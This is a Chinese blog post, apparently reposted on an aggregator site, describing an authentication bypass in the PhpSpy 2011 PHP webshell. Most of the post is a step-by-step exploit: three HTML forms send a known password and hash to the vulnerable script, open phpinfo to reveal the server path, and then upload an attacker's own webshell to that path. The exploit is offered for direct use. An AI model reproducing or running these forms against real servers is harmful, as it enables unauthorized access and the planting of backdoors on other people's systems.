zoukankan      html  css  js  c++  java
  • Phpspy 2011继续身份验证绕过漏洞

    Author: Tm3yShell7

    官方目前下载已经修补上了 目前官方下载是2011.php, 文件名为2011ok.php的是带洞版本。

    今天m0r5和我说phpspy2011 我都不知道2011出来了  – – 就下下来看看

    发现2011有不少借鉴WSO Shell的地方,看到$pass还是在那个函数的上面,但是验证成功过后用了一个Location重定向了一下,之后会再次检查一次cookies。

    但是想不明白作者为什么这样做,和2010的原理一样,一样绕过:

    下面给出一个更为直接的利用方法,上传你自己的新shell:
    <form method="POST" action="http://www.webshell.cc/2011ok11.php">
    <input name="password" type="text" size="20" value="hackshell_net">
    <input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
    <input type="hidden" name="action" value="login">
    <input type="submit" value="Login"></form>

    点击Login,这步点登录后 是登录界面  继续操作下一步:
    <form method="POST" action="http://www.webshell.cc/2011ok.php">
    <input name="password" type="text" size="20" value="hackshell_net">
    <input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
    <input type="hidden" name="action" value="phpinfo"><input type="submit" value="Login"></form>

    密码写hackshell_net (默认写好) 点击login之后 查看当前脚本绝对路径,
    然后访问:
    <form action="http://www.webshell.cc/2011ok.php" method="POST" enctype="multipart/form-data">
    <input name="password" type="password" size="20">
    <input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">

    <input name=”uploadfile” value=”” type=”file”>
    <input name=”doupfile” value=”Upload” type=”submit”>
    <input name=”uploaddir” value=”D:/workspace/” type=”hidden”>
    <input name=”dir” value=”D:/workspace/” type=”hidden”>
    </form>
    其中把iploaddir的value改为phpinfo中看到的路径,上传shell。

  • 相关阅读:
    android onTouchEvent
    AD smart pdf 中文丢失
    c# 定时器
    Android 绘制圆环
    52道Python面试题
    螺旋填数:读入两个整数m,n,输出一个m行n列的矩阵,这个矩阵是1~m*n这些自然数按照右、下、左、上螺旋填入的结果。
    Java经典练习题_Day04
    Java经典练习题_Day05
    Java 面向对象 初探
    Java Array 方法和使用
  • 原文地址:https://www.cnblogs.com/swyft/p/5539601.html
Copyright © 2011-2022 走看看